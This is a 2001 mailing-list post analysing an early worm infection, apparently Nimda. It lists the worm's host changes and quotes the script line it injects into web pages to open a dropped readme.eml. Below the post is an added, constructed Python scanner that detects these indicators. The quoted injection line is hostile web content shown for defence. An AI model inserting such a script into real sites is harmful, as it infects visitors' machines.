[thelist] failure notice

Ron Thigpen rthigpen at nc.rr.com
Tue Sep 18 10:44:13 CDT 2001


this looks like the result of a new worm said to be propagating.  early 
analysis has the worm giving admin permissions to guest account of 
infected host, replacing Admin.dll with infected code (via ftp?), 
placing the file readme.eml in the webroot, and adding the following 
line of script to the home page.

language="JavaScript">window.open("readme.eml", null, 
"resizable=no,top=6000,left=6000")

this looks like it may be the first wild exploit of this vulnerability:

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms01-020.asp

--rt

MAILER-DAEMON at welly-4.star.net.uk wrote:

> Hi. This is the qmail-send program at welly-4.star.net.uk.
> I'm afraid I wasn't able to deliver your message to the following addresses.
> This is a permanent error; I've given up. Sorry it didn't work out.
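
A defender-side check for the web-facing indicators listed in the message above, added here as an example and not part of the original post: it walks a webroot looking for a dropped readme.eml, pages carrying the quoted window.open("readme.eml" call, and any Admin.dll to compare against a known-good copy. The function names, the set of page extensions and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Matches the injected call quoted in the post. Allowing either quote style and
# extra whitespace is an assumption; the post shows only one form.
INJECTED = re.compile(r"""window\.open\(\s*["']readme\.eml["']""", re.IGNORECASE)
PAGE_EXTS = {".htm", ".html", ".asp"}  # assumed set of page types to inspect


def scan_webroot(root):
    """Return sorted (indicator, relative_path) pairs found under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            lower = name.lower()
            if lower == "readme.eml":
                hits.append(("dropped-file", rel))
            elif lower == "admin.dll":
                # The post does not say where Admin.dll lives; flag every copy
                # for manual comparison against a known-good file.
                hits.append(("review-admin-dll", rel))
            elif os.path.splitext(lower)[1] in PAGE_EXTS:
                with open(path, "r", encoding="latin-1") as fh:
                    if INJECTED.search(fh.read()):
                        hits.append(("injected-script", rel))
    return sorted(hits)


def build_sample(root):
    """Constructed sample webroot: one clean page, one modified, one dropped file."""
    os.makedirs(os.path.join(root, "docs"))
    with open(os.path.join(root, "docs", "about.html"), "w") as fh:
        fh.write("<html><body>About us</body></html>\n")
    with open(os.path.join(root, "default.htm"), "w") as fh:
        fh.write("<html><body>Home</body></html>\n"
                 'language="JavaScript">window.open("readme.eml", null, '
                 '"resizable=no,top=6000,left=6000")\n')
    with open(os.path.join(root, "readme.eml"), "w") as fh:
        fh.write("placeholder, not a real message\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for indicator, rel in scan_webroot(tmp):
            print(f"{indicator:16} {rel}")
```

The guest-account permission change mentioned in the post is a host setting rather than a file, so this scan does not cover it.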






